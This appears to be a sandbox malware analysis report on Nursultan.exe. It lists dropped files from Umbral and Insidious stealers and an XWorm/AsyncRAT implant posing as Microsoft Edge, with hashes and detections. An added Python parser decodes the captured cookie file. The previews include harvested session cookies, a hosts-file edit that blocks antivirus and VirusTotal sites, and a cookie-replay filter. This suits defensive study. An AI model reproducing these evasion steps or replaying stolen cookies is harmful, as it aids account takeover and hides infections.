                                      Preview:PK..........&Y.*C.....!...#...Browsers\Cookies\Chrome Cookies.txt}.Kr.0...u..(..!.]t.-.4..o`.....2|...w...;.S..o..R.7..........0!...T.S.#]'...q.*R...".b..(..Tg....C...'...[g*C{..}...]N...N]..nR..R;.!]3.H.&)..8..<..U......<.fJ...Q^U?s.q%.%-...4......3...g7..p..>..T....*..{.8JZ..k.e......|m...........PK..........&YO..v.....2......Display\Display.pngl.wT.Q....4.((%. X#( .Ih.D.MQZ@T....$..^..J...J. M.H......-@.....w.w...:.d....o.}.L......y.......6..X./..l..C}..}`p7........^...P..I..w(.+.cw...........8....a.m.Ac..j..........r...~.e..i.^.g.Ij..e...e....k.?.;...e...g..;...eS{.=..(Q+..2.L...8..).L.....NK..n.&<.V..=....?...3;{Y..3.......X..<}.P...S..M.P.bZP.S.<*..;..].ox.\.yr....X.r..D.=|q..g.L...^ig..%Z...mz........<k9....b.^!.....b8.T..`*.I...v.x.j.i..G......).#....R..K...J.....e$P..K.H.9fT....?v...|..d.p.X20T.o.?`b}.".Pk...{....GL.`..\..u}..\..Gw....u.0t..*~.....'..3....<.(~t/.W...1....\(M..%G.R.EI....D..i...kn....xY.l.zGp..bz.&....-G|...N,~$..Z,.k....'...bU;...
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):289
                                      Entropy (8bit):5.76524051718901
                                      Encrypted:false
                                      SSDEEP:6:Pk3rcDxbuQ03r4KcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAy:c7EEQ074KcW1NOpFwUuQLHaU9WvH9
                                      MD5:B11F445211C21DB45D7B779A5C6E2444
                                      SHA1:27641DD5D8824CD6596FB862681846DAE17A8BBB
                                      SHA-256:11CB0CB1CC5B9BAF4FFB0F950F667FBCC688979D5096DEDCE9883242990955FC
                                      SHA-512:A504B9E59E392209298C2E3113FB06DF75167FD2B36D69BA408BC6BA682D47F015656B06AE270928A7BEF685705E28C20E85786B53DFC308F6952984EA6FC2A0
                                      Malicious:false
                                      Preview:.google.com.TRUE./.FALSE.13343492415760663.1P_JAR.2023-10-04-13...google.com.TRUE./.FALSE.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4..
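The Chrome Cookies.txt previewed above uses the tab-separated Netscape cookie-file layout (domain, include-subdomains flag, path, secure flag, expiry, name, value), but its expiry column holds 17-digit numbers. Those are far too large to be the Unix seconds the Netscape layout defines and match Chromium's microseconds-since-1601-01-01 timestamps copied straight out of the browser database; that is an inference from the values, not something the report states. The parser below is an added example, not code from the report or from Umbral; its input is reconstructed from the preview (the "." separators read as tabs and CRLF), and the 10**14 threshold for telling the two epochs apart is a choice of this example.

```python
"""Parse a stealer's Netscape-style cookie export, normalising Chromium
microsecond timestamps to Unix seconds.

Added example, not part of the Joe Sandbox report.
"""
import datetime as dt
from typing import NamedTuple, Optional

UTC = dt.timezone.utc
WEBKIT_TO_UNIX = 11_644_473_600   # seconds from 1601-01-01 to 1970-01-01

# Constructed from the report's preview of "Chrome Cookies.txt".
COOKIES_TXT = (
    ".google.com\tTRUE\t/\tFALSE\t13343492415760663\t1P_JAR\t2023-10-04-13\r\n"
    ".google.com\tTRUE\t/\tFALSE\t13356711615760707\tNID\t"
    "511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-"
    "IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-"
    "c5JWadCSsULPLzhSx-F-6wOg4\r\n"
)


class Cookie(NamedTuple):
    domain: str
    include_subdomains: bool
    path: str
    secure: bool
    expires: Optional[dt.datetime]   # None for a session cookie
    name: str
    value: str


def parse_expiry(raw: str) -> Optional[dt.datetime]:
    """Accept Unix seconds or Chromium microseconds since 1601 (assumed split
    at 10**14: no Unix-seconds value is that large, every Chromium value is)."""
    n = int(raw)
    if n == 0:
        return None
    if n >= 10**14:
        n = n // 10**6 - WEBKIT_TO_UNIX
    return dt.datetime.fromtimestamp(n, UTC)


def parse_netscape_cookies(text: str) -> list:
    cookies = []
    for line in text.splitlines():
        if line.startswith("#HttpOnly_"):       # curl's marker for HttpOnly cookies
            line = line[len("#HttpOnly_"):]
        elif not line or line.startswith("#"):  # comment or blank
            continue
        fields = line.split("\t")
        if len(fields) != 7:
            raise ValueError(f"expected 7 tab-separated fields: {line!r}")
        domain, subs, path, secure, expiry, name, value = fields
        cookies.append(Cookie(domain, subs == "TRUE", path, secure == "TRUE",
                              parse_expiry(expiry), name, value))
    return cookies


def to_netscape_unix(cookies: list) -> str:
    """Re-emit the file with Unix-second expiries as the layout defines."""
    lines = []
    for c in cookies:
        exp = 0 if c.expires is None else int(c.expires.timestamp())
        lines.append("\t".join([c.domain, "TRUE" if c.include_subdomains else "FALSE",
                                c.path, "TRUE" if c.secure else "FALSE",
                                str(exp), c.name, c.value]))
    return "\n".join(lines) + "\n"


def still_valid(cookies: list, now: dt.datetime) -> list:
    """Cookies an attacker could still replay at time `now`."""
    return [c for c in cookies if c.expires is None or c.expires > now]


if __name__ == "__main__":
    for c in parse_netscape_cookies(COOKIES_TXT):
        print(c.name, "expires", c.expires.isoformat())
```

Converted, 1P_JAR expires on 2023-11-03 and NID on 2024-04-04, both at 13:40:15 UTC, which lines up with the "2023-10-04-13" in the 1P_JAR value (a one-month cookie set on 4 October at 13h) and with NID's six-month lifetime; the identical time of day on both is what you would expect from a Chromium profile captured in one session. For incident scoping, `still_valid` is the list of sessions to invalidate, and `to_netscape_unix` produces a file that standard Netscape-format consumers interpret with the intended expiry.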
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):471707
                                      Entropy (8bit):7.9215668668207755
                                      Encrypted:false
                                      SSDEEP:12288:bmsZO01Br3OScVq+XOOxBHMGg7aj0OVM6V:Ce1B7OS9y/xBHVgujx
                                      MD5:9C214F98808DC74B8BD74383ACB93C92
                                      SHA1:0754EEEC35F33B75F962D2A27B0DA4ADD7A5AFF5
                                      SHA-256:F3C7F22484E96D6A424484C9D9E531A11B9A98509D08CBC7E4EB2CC84EE6491A
                                      SHA-512:5640182605A63BED2FDA87DAFF68ECFAC704BF78CC2CDDCF06350FC30692877897FC75A8620EDA952DF9C0C39C21B732B882D4161F514B56573E87B456E11F56
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):236544
                                      Entropy (8bit):6.080049516389128
                                      Encrypted:false
                                      SSDEEP:6144:xloZM+rIkd8g+EtXHkv/iD4YD+rmkrHMs9YW3X2TFb8e1m9H4i:DoZtL+EP8YD+rmkrHMs9YW3X25IHB
                                      MD5:DF69E1468A4656F2EEC526DE59A89A8B
                                      SHA1:E65E192BE57CD672B8EF19CD72AD89CBD3F8F60A
                                      SHA-256:4D3A9636E9D29F227B56D7BF140154384E1F426B69CF213AE46115E8D966AA92
                                      SHA-512:409DCA3F4CE130034B3004726939A59F38939D46E09F04D6C8A77EA20E3FF931D1A7332F00C06C3E46D8C64796AC93299C2F5A6595777F3E05CF89BC0522449F
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 92%
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (3953), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):9376
                                      Entropy (8bit):5.740026667303915
                                      Encrypted:false
                                      SSDEEP:96:VpoiWTxQ9t6rK5jHzhqfmA6WoU34PuktJ5utaM/5HTFNnGFkiZ6NUbfFQJswi54k:YTxQ92cVABQMQzPOWBjneY
                                      MD5:A4E674B923499465DD85B96B18EBCF3D
                                      SHA1:65838CCFC2B3A0B4928CFEF85C50FF33E54DF1CF
                                      SHA-256:433662D2A7E13057D8575252B953ABBAFBD9B932BF778C989124D5DB2C1EBCF9
                                      SHA-512:591E2F147A44419558E12BC140E19F7FE68B4B588B44986D3FE46C5141CA1FCE9F6FC78E43F136912B79368AA0BD33279B326EF81473EE373E38DED73D80F710
                                      Malicious:false
                                      Preview:@echo off..for /F %%a in ('ECHO prompt $E ^| cmd') do (.. SET "ESC=%%a"..)..chcp 65001..cls..SETLOCAL enabledelayedexpansion..>nul timeout 4 /nobreak..goto :main......:: .......... ..... ... ..... ........:passwd..for /f "skip=1 delims= eol=" %%c in ('"echo(|replace foo . /u /w"') do set "CR=%%c"..for /f %%c in ('"prompt $H & for %%_ in (_) do rem"') do set "BS=%%c"..echo(|set /p ="!ESC![0m ......: "..set result=..:run..set c=..for /f "skip=1 delims= eol=" %%c in ('"replace foo . /u /w"') do set "c=%%c"..if "%c%"=="%bs%" goto backspace..if "%c%"=="%cr%" goto enter..goto char..:backspace.. if "%result%"=="" goto run.. set result=%result:~0,-1%.. echo|set /p =%bs% %bs%.. goto run..:char.. set result=%result%%c%.. echo |set /p =*.. goto run..:enter.. goto check....:check..echo(..echo(..echo(..>nul timeout 4 /nobreak..if "%login%" == "" goto checkfailed..if "%result%" == "" goto checkfailed..goto checkaccess........:: ......... ...
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):106496
                                      Entropy (8bit):1.136413900497188
                                      Encrypted:false
                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                      MD5:429F49156428FD53EB06FC82088FD324
                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):40960
                                      Entropy (8bit):0.8553638852307782
                                      Encrypted:false
                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                      Category:dropped
                                      Size (bytes):5242880
                                      Entropy (8bit):0.03859996294213402
                                      Encrypted:false
                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.121297215059106
                                      Encrypted:false
                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):0.8746135976761988
                                      Encrypted:false
                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):98304
                                      Entropy (8bit):0.08235737944063153
                                      Encrypted:false
                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):634
                                      Entropy (8bit):4.1659857078646425
                                      Encrypted:false
                                      SSDEEP:6:pYcCFWl4BjJ/Q/FVIK923fS+KRwSTeaOcMpDSQJY6u0GhS/rG1e7VMXjvPfA67X:pYzd/Gg7STevpOqY6V2MUe7VWTA6r
                                      MD5:2C45F7B812D088B54D89CD9CCD846558
                                      SHA1:4CC822A5D92D9712A5FE06C38D1AEC56D7779436
                                      SHA-256:02AABFADCA32ADD37A81D90892F770B6269B67B303291A9EF1B7495D0F61AFF7
                                      SHA-512:D82F7C330D40BC12A215FCB9857BAE3ED2E24AB3104E6D66DA8C151A9BFD555CBF7391E8CF8C210C4FB12071707E684477227F61E955199562D6BD46E434F211
                                      Malicious:false
                                      Preview: ==================================================. Operating system: Windows 10 Pro (64 Bit). PC user: 927537/user. ClipBoard: . Launch: C:\Users\user\AppData\Local\Temp\Insidious.exe. ==================================================. Screen resolution: 1280x1024. Current time: 06/09/2024 23:26:28. HWID: 6C5A2B7595. ==================================================. CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz. RAM: 4094MB. GPU: _ZC93PUYX. ==================================================. IP Geolocation: Fail Fail. Log Date: 09/06/2024 7:47. BSSID: 00:50:56:a7:21:15. ==================================================
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):4757
                                      Entropy (8bit):4.845597992083603
                                      Encrypted:false
                                      SSDEEP:24:XQUHIJ7J7J7J70qXsqJ70J7J7qJ7J7qJ7qJ7uJ7qQzuJ7qJ7qJ7J7xJ7J7J7xJ7H:AVMx1zRKz3vtTLXNpQtLPze
                                      MD5:189FAFC96CB93F9973827ABC5803756A
                                      SHA1:BDE81E36E2EA6B7158B8D34E1BCA35DB37437F6C
                                      SHA-256:C487C044F2A5C2352684FD0652D644E2B8F739BA0E92C1BBB99767151E477A51
                                      SHA-512:D1F9BCF1CA73DA010A6030B29C53FCEB5FADB4AACA3500D3BD6CA4483FDDA5DD4C35CD8730B0E9E097A7F103825B59FB6011AD719E981F233B943E7BD7C8661C
                                      Malicious:false
                                      Preview:NAME: svchost..NAME: RuntimeBroker..NAME: csrss..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: conhost..NAME: svchost..NAME: dllhost..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: conhost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: cmd..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: spoolsv..NAME: sihost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: fontdrvhost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: fontdrvhost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):519644
                                      Entropy (8bit):7.917372257001001
                                      Encrypted:false
                                      SSDEEP:12288:eNpmJapra/aHl4T5tOjgICmFeOgjj02SoyaFF8QQImYm07:1ApraSHmT7OjgTO2HyNQNjX7
                                      MD5:B92EB58AFF64853590AD7933C9483453
                                      SHA1:27D613E0D07AEBDD58AD6E33012F44548FC6EBEE
                                      SHA-256:1C25E1488463056B9063DCA6264C7B3F871C60D1F6076130C5493A6AD219A414
                                      SHA-512:CF530E7ECEA01F2136682C46623CD6549E1DB0702DF8BBDB251207643E522A6725F24A19468E792B0BF91801E1A6CB83B78A87F979ABDB1EEC607258EBF838E0
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):212480
                                      Entropy (8bit):6.336877018807866
                                      Encrypted:false
                                      SSDEEP:3072:BXOsMDK0jn/VFJIYjbdU2BLOw5KRUGKXs+S++7KFSbxeY+qDDrMP:BoKc/Jjb6MJLGqStKEbxI
                                      MD5:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      SHA1:033474BEFFB4C91158BD208EB80B39C0A26F6B2D
                                      SHA-256:DFCF3ED114355B554D2A3814946029C2688C4F617959B69375ED730250B9E9B1
                                      SHA-512:556A2CE11D01DE6C940306DA1A1D27BFE95EC52071A0762FD5F27FC5D9D4BE7BD50F9BC7DF922F483F8068783DD29CF81C9A492656DA21285C91404F1D603DDC
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Microsoft Edge, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Microsoft Edge, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Microsoft Edge, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 84%
                                      Process:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Sep 6 22:47:39 2024, mtime=Fri Sep 6 22:47:39 2024, atime=Fri Sep 6 22:47:39 2024, length=212480, window=hide
                                      Category:dropped
                                      Size (bytes):778
                                      Entropy (8bit):5.020060746240808
                                      Encrypted:false
                                      SSDEEP:12:8Ji4fry88CcllsY//kELnqmjAZsHSunDWNMMM+mV:8Rfrp8blZsmnxALuniNMMM+m
                                      MD5:D44E0DB77C4F08E7C8E519C4F6F3BA73
                                      SHA1:1CE7D0679D759AAF3C9E782BF5D4C39E7420CE84
                                      SHA-256:DF0CF53F79D03992293DEA9A52C6871BB5F9C32827DE87E84E87D1F69597C80D
                                      SHA-512:C2752A68512655265828E6ED65DE014875D4E73F3667D07914A8509BDF8FF096D8147E914F2BFE8B2F00A2F3EA17057987610A3567F06B7490D81015900E61FB
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:ASCII text, with CRLF, LF line terminators
                                      Category:dropped
                                      Size (bytes):2223
                                      Entropy (8bit):4.573013811987098
                                      Encrypted:false
                                      SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                      MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                      SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                      SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                      SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                      Malicious:true
                                      Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.
                                      Process:C:\Windows\System32\timeout.exe
                                      File Type:ASCII text, with CRLF line terminators, with overstriking
                                      Category:dropped
                                      Size (bytes):59
                                      Entropy (8bit):4.678921862774486
                                      Encrypted:false
                                      SSDEEP:3:hYFJKARcWmFsFJQZkOyn:hYFJXmFSQZkPn
                                      MD5:C43FC38F829B3C2CB4D7DB6E0FD40C08
                                      SHA1:54CD6E501D17F0CE9E6C0697D6AAD274ECDD5C74
                                      SHA-256:9D33CAB2F975129A4CD97D2348BCA16ED414647B5CE4C53FF3302D2CB26D11AB
                                      SHA-512:47CDDF4A52553D270B5EA9367012AEF4DCDB71767EA03E6164B8BBD2A5D93BB4A7406A493DAA4FF24EB41C59270E6BC1043CEC03299F84D36F44C4C87823295A
                                      Malicious:false
                                      Preview:..Waiting for 4 seconds, press CTRL+C to quit ....3.2.1.0..
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.993891283799074
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:Nursultan.exe
                                      File size:920'064 bytes
                                      MD5:ccfa4401df6dcaef4265f5edd06f3fde
                                      SHA1:f96f403087bb1ad5483bc68a5a3db8a1ca833f4e
                                      SHA256:366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4
                                      SHA512:02d1efcaaf84cd39c585359edc613daac7d6006adcd714b027d2f9ac5fe8184cb5cc7bb61762cd766d4f409149635d422d8a4b318970c6666e7caf2c16d208ac
                                      SSDEEP:24576:9tZhUkDINlUj3HMcggFUnCwCjsiD5udn3:9tZySIUj3HDgyUCrjsi
                                      TLSH:6515337E03DD8700D44E1D3863B74D1361A76A92B03EA38CBB4825CE1BAD6678DDB14B
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................n.... ... ....@.. .......................`............@................................
                                      Icon Hash:0f13ec78995d1f0e
                                      Entrypoint:0x4e0c6e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66CEFAC5 [Wed Aug 28 10:24:05 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                       Name | Virtual Address | Virtual Size | Is in Section
                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe0c1c | 0x4f | .text
                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe2000 | 0x1634 | .rsrc
                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe4000 | 0xc | .reloc
                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
